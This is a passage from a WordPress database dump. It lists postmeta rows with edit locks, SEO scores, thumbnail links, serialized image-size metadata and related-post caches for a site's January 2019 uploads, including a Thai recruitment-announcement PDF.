th\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11007, 4937, '_thumbnail_id', '4939'),
(11011, 4937, '_hide_featured', NULL),
(11012, 4937, '_yoast_wpseo_content_score', '30'),
(11013, 4937, '_yoast_wpseo_primary_category', '31'),
(11014, 4937, '_wpas_done_all', '1'),
(11015, 4941, '_edit_lock', '1546916018:3'),
(11016, 4941, '_edit_last', '3'),
(11017, 4941, '_hide_featured', NULL),
(11018, 4941, '_yoast_wpseo_content_score', '30'),
(11019, 4941, '_yoast_wpseo_primary_category', '31'),
(11020, 4943, '_wp_attached_file', '2019/01/48430306_728853917490799_3380259001345245184_o.jpg'),
(11021, 4943, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:58:\"2019/01/48430306_728853917490799_3380259001345245184_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48430306_728853917490799_3380259001345245184_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48430306_728853917490799_3380259001345245184_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48430306_728853917490799_3380259001345245184_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48430306_728853917490799_3380259001345245184_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48430306_728853917490799_3380259001345245184_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11022, 4941, '_thumbnail_id', '4943'),
(11026, 4941, '_wpas_done_all', '1'),
(11027, 4945, '_edit_lock', '1546916930:3'),
(11028, 4945, '_edit_last', '3'),
(11033, 4946, '_wp_attached_file', '2019/01/48381822_728854897490701_4657304966317211648_o.jpg'),
(11034, 4946, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1198;s:6:\"height\";i:882;s:4:\"file\";s:58:\"2019/01/48381822_728854897490701_4657304966317211648_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48381822_728854897490701_4657304966317211648_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48381822_728854897490701_4657304966317211648_o-300x221.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48381822_728854897490701_4657304966317211648_o-768x565.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48381822_728854897490701_4657304966317211648_o-1024x754.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:754;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48381822_728854897490701_4657304966317211648_o-400x294.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11035, 4945, '_thumbnail_id', '4946'),
(11039, 4945, '_hide_featured', NULL),
(11040, 4945, '_yoast_wpseo_content_score', '30'),
(11041, 4945, '_yoast_wpseo_primary_category', '31'),
(11042, 4945, '_wpas_done_all', '1'),
(11043, 4949, '_wp_attached_file', '2019/01/ประกาศ-รับสมัครสอบคัดเลือกเจ้าหน้าที่ธุรการ-edit.pdf'),
(11048, 4951, '_edit_lock', '1546917308:3'),
(11049, 4951, '_edit_last', '3'),
(11050, 4952, '_wp_attached_file', '2019/01/8-1-2562-10-14-00.png'),
(11051, 4952, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:510;s:6:\"height\";i:766;s:4:\"file\";s:29:\"2019/01/8-1-2562-10-14-00.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-14-00-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-14-00-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-14-00-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11052, 4953, '_wp_attached_file', '2019/01/48420504_730625390646985_9201092473827360768_o.jpg'),
(11053, 4953, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2019/01/48420504_730625390646985_9201092473827360768_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48420504_730625390646985_9201092473827360768_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48420504_730625390646985_9201092473827360768_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48420504_730625390646985_9201092473827360768_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48420504_730625390646985_9201092473827360768_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48420504_730625390646985_9201092473827360768_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11054, 4951, '_thumbnail_id', '4953'),
(11058, 4951, '_hide_featured', NULL),
(11059, 4951, '_yoast_wpseo_content_score', '30'),
(11060, 4951, '_yoast_wpseo_primary_category', '31'),
(11061, 4951, '_wpas_done_all', '1'),
(11062, 4955, '_edit_lock', '1546917759:3'),
(11063, 4955, '_edit_last', '3'),
(11064, 4956, '_wp_attached_file', '2019/01/48429443_731210100588514_8980302524560965632_o.jpg'),
(11065, 4956, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/48429443_731210100588514_8980302524560965632_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48429443_731210100588514_8980302524560965632_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48429443_731210100588514_8980302524560965632_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48429443_731210100588514_8980302524560965632_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48429443_731210100588514_8980302524560965632_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48429443_731210100588514_8980302524560965632_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11066, 4955, '_thumbnail_id', '4956'),
(11070, 4955, '_hide_featured', NULL),
(11071, 4955, '_yoast_wpseo_content_score', '30'),
(11072, 4955, '_yoast_wpseo_primary_category', '31'),
(11073, 4955, '_wpas_done_all', '1'),
(11074, 4958, '_edit_lock', '1546917823:3'),
(11075, 4958, '_edit_last', '3'),
(11076, 4959, '_wp_attached_file', '2019/01/48418088_731215260587998_8842527116235898880_o.jpg'),
(11077, 4959, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/48418088_731215260587998_8842527116235898880_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48418088_731215260587998_8842527116235898880_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48418088_731215260587998_8842527116235898880_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48418088_731215260587998_8842527116235898880_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48418088_731215260587998_8842527116235898880_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48418088_731215260587998_8842527116235898880_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11078, 4958, '_thumbnail_id', '4959'),
(11082, 4958, '_hide_featured', NULL),
(11083, 4958, '_yoast_wpseo_content_score', '30'),
(11084, 4958, '_yoast_wpseo_primary_category', '31'),
(11085, 4958, '_wpas_done_all', '1'),
(11086, 4961, '_edit_lock', '1546918386:3'),
(11087, 4961, '_edit_last', '3'),
(11088, 4962, '_wp_attached_file', '2019/01/49267029_731317990577725_8424501819081752576_n.jpg'),
(11089, 4962, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:641;s:4:\"file\";s:58:\"2019/01/49267029_731317990577725_8424501819081752576_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49267029_731317990577725_8424501819081752576_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49267029_731317990577725_8424501819081752576_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49267029_731317990577725_8424501819081752576_n-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49267029_731317990577725_8424501819081752576_n-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11090, 4961, '_thumbnail_id', '4962'),
(11094, 4961, '_hide_featured', NULL),
(11095, 4961, '_yoast_wpseo_content_score', '30'),
(11096, 4961, '_yoast_wpseo_primary_category', '31'),
(11097, 4961, '_wpas_done_all', '1'),
(11098, 4964, '_edit_lock', '1546919043:3'),
(11099, 4964, '_edit_last', '3'),
(11100, 4965, '_wp_attached_file', '2019/01/48417488_731813057194885_7345012555745591296_o.jpg'),
(11101, 4965, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/48417488_731813057194885_7345012555745591296_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48417488_731813057194885_7345012555745591296_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48417488_731813057194885_7345012555745591296_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48417488_731813057194885_7345012555745591296_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48417488_731813057194885_7345012555745591296_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48417488_731813057194885_7345012555745591296_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11102, 4964, '_thumbnail_id', '4965'),
(11106, 4964, '_hide_featured', NULL),
(11107, 4964, '_yoast_wpseo_content_score', '30'),
(11108, 4964, '_yoast_wpseo_primary_category', '31'),
(11109, 4964, '_wpas_done_all', '1'),
(11110, 4967, '_edit_lock', '1546919462:3'),
(11111, 4967, '_edit_last', '3'),
(11112, 4968, '_wp_attached_file', '2019/01/8-1-2562-10-49-39.png'),
(11113, 4968, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:501;s:6:\"height\";i:793;s:4:\"file\";s:29:\"2019/01/8-1-2562-10-49-39.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-49-39-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-49-39-190x300.png\";s:5:\"width\";i:190;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-49-39-190x300.png\";s:5:\"width\";i:190;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11114, 4969, '_wp_attached_file', '2019/01/48429212_732402777135913_598125276014051328_o.jpg'),
(11115, 4969, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:57:\"2019/01/48429212_732402777135913_598125276014051328_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"48429212_732402777135913_598125276014051328_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"48429212_732402777135913_598125276014051328_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"48429212_732402777135913_598125276014051328_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"48429212_732402777135913_598125276014051328_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"48429212_732402777135913_598125276014051328_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11116, 4967, '_thumbnail_id', '4969'),
(11120, 4967, '_hide_featured', NULL),
(11121, 4967, '_yoast_wpseo_content_score', '30'),
(11122, 4967, '_yoast_wpseo_primary_category', '31'),
(11123, 4967, '_wpas_done_all', '1'),
(11124, 4971, '_edit_lock', '1546919761:3'),
(11125, 4971, '_edit_last', '3'),
(11126, 4972, '_wp_attached_file', '2019/01/8-1-2562-10-54-40.png'),
(11127, 4972, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:504;s:6:\"height\";i:725;s:4:\"file\";s:29:\"2019/01/8-1-2562-10-54-40.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-54-40-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-54-40-209x300.png\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-1-2562-10-54-40-209x300.png\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11128, 4971, '_thumbnail_id', '4974'),
(11132, 4971, '_hide_featured', NULL),
(11133, 4971, '_yoast_wpseo_content_score', '30'),
(11134, 4971, '_yoast_wpseo_primary_category', '31'),
(11135, 4971, '_wpas_done_all', '1'),
(11136, 4974, '_wp_attached_file', '2019/01/49205946_732408127135378_4233994441322397696_o.jpg'),
(11137, 4974, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/49205946_732408127135378_4233994441322397696_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49205946_732408127135378_4233994441322397696_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49205946_732408127135378_4233994441322397696_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49205946_732408127135378_4233994441322397696_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"49205946_732408127135378_4233994441322397696_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49205946_732408127135378_4233994441322397696_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11140, 4975, '_edit_lock', '1546921936:3'),
(11141, 4975, '_edit_last', '3'),
(11142, 4976, '_wp_attached_file', '2019/01/49204557_733180783724779_2079552645655166976_o.jpg'),
(11143, 4976, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/49204557_733180783724779_2079552645655166976_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49204557_733180783724779_2079552645655166976_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49204557_733180783724779_2079552645655166976_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49204557_733180783724779_2079552645655166976_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"49204557_733180783724779_2079552645655166976_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49204557_733180783724779_2079552645655166976_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11144, 4975, '_thumbnail_id', '4976'),
(11148, 4975, '_hide_featured', NULL),
(11149, 4975, '_yoast_wpseo_content_score', '30'),
(11150, 4975, '_yoast_wpseo_primary_category', '31'),
(11151, 4975, '_wpas_done_all', '1'),
(11152, 4964, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575714211;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4718;}i:1;a:1:{s:2:\"id\";i:3988;}i:2;a:1:{s:2:\"id\";i:4951;}}}}'),
(11153, 4958, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575701578;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3975;}i:1;a:1:{s:2:\"id\";i:4742;}i:2;a:1:{s:2:\"id\";i:4971;}}}}'),
(11154, 4971, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575665145;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5769;}i:1;a:1:{s:2:\"id\";i:3975;}i:2;a:1:{s:2:\"id\";i:6285;}}}}'),
(11155, 4951, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575620298;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4937;}i:1;a:1:{s:2:\"id\";i:4884;}i:2;a:1:{s:2:\"id\";i:4887;}}}}'),
(11156, 4941, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575642943;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4765;}i:1;a:1:{s:2:\"id\";i:4934;}i:2;a:1:{s:2:\"id\";i:4907;}}}}'),
